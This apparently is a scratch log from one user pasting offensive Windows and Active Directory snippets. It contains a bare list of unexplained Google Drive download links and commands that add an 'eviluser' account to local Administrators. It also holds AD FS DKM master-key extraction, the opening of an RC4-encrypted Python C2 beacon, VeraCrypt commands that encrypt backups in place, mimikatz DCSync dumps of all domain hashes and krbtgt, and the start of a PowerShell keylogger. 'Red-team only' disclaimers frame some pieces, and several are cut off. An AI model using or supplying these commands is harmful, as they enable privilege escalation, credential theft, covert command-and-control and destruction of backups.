justaguywhocodes

https://drive.usercontent.google.com/download?id=1-c0mDrGPd85ch9MONa3W4w69GZlHNj9Y&export=download&authuser=0

https://drive.usercontent.google.com/download?id=1Yop_c1oOFQv-fn8cmqc_XzP8bEbn2IYr&export=download&authuser=0

justaguywhocodes

https://drive.usercontent.google.com/download?id=1bHVGsTe94U5BttsF_ME8hqd5tssoR-2J&export=download&authuser=0

justaguywhocodes

ommands to Execute (from a standard user or attacker context)Option 1: Using net localgroup (most common, loudest, almost always detected by modern EDR)cmd

net localgroup Administrators eviluser /add

Option 2: Using net.exe with domain account (if testing domain user to local admin)cmd

net localgroup Administrators "DOMAIN\eviluser" /add

Option 3: Using PowerShell Add-LocalGroupMember (very common in modern attacks)powershell

justaguywhocodes

https://github.com/C-Sto/gosecretsdump/releases

justaguywhocodes

Enable-WindowsOptionalFeature -Online -FeatureName IIS-WebServerRole, IIS-WebServer, IIS-CommonHttpFeatures, IIS-HttpErrors, IIS-HttpRedirect, IIS-ApplicationDevelopment, IIS-NetFxExtensibility45, IIS-HealthAndDiagnostics, IIS-HttpLogging, IIS-LoggingLibraries, IIS-RequestMonitor, IIS-HttpTracing, IIS-Security, IIS-RequestFiltering, IIS-HttpCompressionDynamic, IIS-WebServerManagementTools, IIS-ManagementConsole, IIS-StaticContent, IIS-DefaultDocument, IIS-DirectoryBrowsing, IIS-WebSockets, IIS-ApplicationInit -All

justaguywhocodes

Commands to test/demonstrate this TTP (testing/red-team purposes only)1. Using PowerShell (AD module) – Recommended for testingpowershell

# Find the AD FS DKM container (one of the two possible locations)
Get-ADObject -Filter { (Name -eq "ADFSSRV") -or (Name -eq "Distributed Key Manager") } -SearchBase "CN=Configuration,DC=contoso,DC=com" -Properties *

# Directly retrieve the DKM master key (new format via KeyCredentialLink)
$dkm = Get-ADObject "CN=ADFSSRV,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=contoso,DC=com" -Properties msDS-KeyCredentialLink
$dkm.msDS-KeyCredentialLink

# Alternative location in newer AD FS versions

justaguywhocodes

import socket
import time
import random
import string
from arc4 import ARC4

# Configuration
C2_SERVER = ('172.31.255.29', 443)   # Change to your lab C2 IP
KEY = b'APT38SecretKey2025!'
BEACON_INTERVAL = 30                  # seconds between beacons (average)

justaguywhocodes

Commands commonly observed in the wild for this TTP (for testing/detection purposes only)Below are typical commands adversaries use with VeraCrypt to encrypt on-premises backups. These are provided strictly for blue-team detection rule creation, lab testing, or red-team emulation in authorized environments.1. Download VeraCrypt (portable version preferred by attackers)powershell

Invoke-WebRequest -Uri "https://launchpad.net/veracrypt/trunk/1.26.7/+download/VeraCrypt_Portable_1.26.7.exe" -OutFile "C:\Temp\VeraCrypt.exe"

2. Create an encrypted container from an existing backup file (most common method)cmd

VeraCrypt.exe /volume "E:\Backups\backup.vhdx" /letter X /password SuperSecret123! /hash sha512 /encryption aes /filesystem NTFS /size 100% /force /quit

or silently:cmd

justaguywhocodes

# Elevate privileges
privilege::debug
token::elevate

# Full domain dump (all hashes)
lsadump::dcsync /domain:corp.local /all /csv

# Specific high-value accounts only
lsadump::dcsync /domain:corp.local /user:krbtgt
lsadump::dcsync /domain:corp.local /user:administrator

justaguywhocodes

Add-Type @'
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("user32.dll")]
    public static extern short GetAsyncKeyState(int vKey);
}
'@

$logFile = "$env:TEMP\keylog.txt"